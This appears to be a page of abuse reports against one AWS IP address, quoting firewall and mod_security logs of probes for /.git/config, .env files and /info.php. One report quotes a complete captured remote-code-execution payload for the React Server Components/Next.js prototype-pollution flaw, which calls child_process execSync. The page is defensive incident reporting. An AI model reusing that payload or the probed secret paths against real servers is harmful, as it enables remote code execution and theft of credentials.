๐ธ๐ช
konseptit
2026-07-26 04:31:38
(1 hour ago)
(mod_security) mod_security triggered on hostname [redacted] 3.77.92.49 (DE/Germany/ec2-3-77-92-49.e ...
show more
(mod_security) mod_security triggered on hostname [redacted] 3.77.92.49 (DE/Germany/ec2-3-77-92-49.eu-central-1.compute.amazonaws.com)
show less
SQL Injection
๐ฑ๐ป
garmtech.com
2026-07-26 03:54:33
(2 hours ago)
IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ...
show more
IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478) MV:{\\"then\\": \\"$1:__proto__:then\\", \\"status\\": \\"resolved_model\\", \\"reason\\": -1, \\"value\\": \\"{\\\\\\"then\\\\\\":\\\\\\"$B1337\\\\\\"}\\", \\"_response\\": {\\"_prefix\\": \\"var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\", \\"_chunks\\": \\"$Q2\\", \\"_formData\\": {\\"get\\": \\"$1:constructor:constructor\\"}}}
show less
Hacking
๐ฑ๐ป
garmtech.com
2026-07-26 03:54:33
(2 hours ago)
IM360 WAF: Direct access to sensitive file or dotfile MV:/.git/config
Web App Attack
๐ท๐บ
DZBOT
2026-07-26 03:37:27
(2 hours ago)
DZBOT: Website Scanning / Scraping
Bad Web Bot
Exploited Host
Web App Attack
๐ณ๐ฑ
homeshowdomain.nl
2026-07-25 22:03:48
(8 hours ago)
Auto-ban: single probe for restricted files (.env / backups / admin endpoints). Likely mass-scan on ...
show more
Auto-ban: single probe for restricted files (.env / backups / admin endpoints). Likely mass-scan on 2026-07-24.
show less
Web App Attack
SSH
Hacking
๐บ๐ธ
TPI-Abuse
2026-07-25 03:28:11
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute ...
show more
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jul 24 23:28:05.256667 2026] [security2:error] [pid 15057:tid 15057] [client 3.77.92.49:59582] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "michaeltravis.com"] [uri "/.git/config"] [unique_id "amQtRa-WUibEiCM_WpqH4wAAAA0"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2026-07-25 03:16:30
(1 day ago)
Fail2Ban: ModSecurity detected a web application attack.
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-07-25 02:35:34
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute ...
show more
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jul 24 22:35:27.788448 2026] [security2:error] [pid 1322107:tid 1322107] [client 3.77.92.49:48786] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "michaelkivisto.com"] [uri "/.git/config"] [unique_id "amQg7y7oCqb8-gXh5qdlBQAAAAw"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
entangled_mongoose
2026-07-25 01:04:40
(1 day ago)
Probed /info.php.
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-07-25 00:32:40
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute ...
show more
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jul 24 20:32:35.238341 2026] [security2:error] [pid 1603825:tid 1603825] [client 3.77.92.49:48304] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "micaden.com.marshvineyards.com"] [uri "/.git/config"] [unique_id "amQEI1piyL6w6YrCHMStOAAAABE"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ณ๐ฑ
homeshowdomain.nl
2026-07-24 22:00:58
(1 day ago)
Auto-ban: >3000 req/min op 2026-07-24
Web App Attack
SSH
Hacking
๐ซ๐ท
dynamix
2026-07-24 08:20:56
(1 day ago)
Multiple WAF Violations
Web App Attack
Anonymous
2026-07-24 08:15:41
(1 day ago)
Multiple web server 400 error codes from same source ip
Web App Attack
๐ณ๐ฑ
i-turnradio.nl
2026-07-24 07:51:51
(1 day ago)
2026-07-24 @ 09:51:51 (CET) ~ Blocked for trying to access: /.env.local
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-07-24 07:24:16
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute ...
show more
(mod_security) mod_security (id:210492) triggered by 3.77.92.49 (ec2-3-77-92-49.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jul 24 03:24:12.069251 2026] [security2:error] [pid 1862052:tid 1862052] [client 3.77.92.49:56302] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "120"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "radiantmessages.com"] [uri "/.git/config"] [unique_id "amMTHDM5-gp1_ffHDYL6wAAAABI"]
show less
Brute-Force
Bad Web Bot
Web App Attack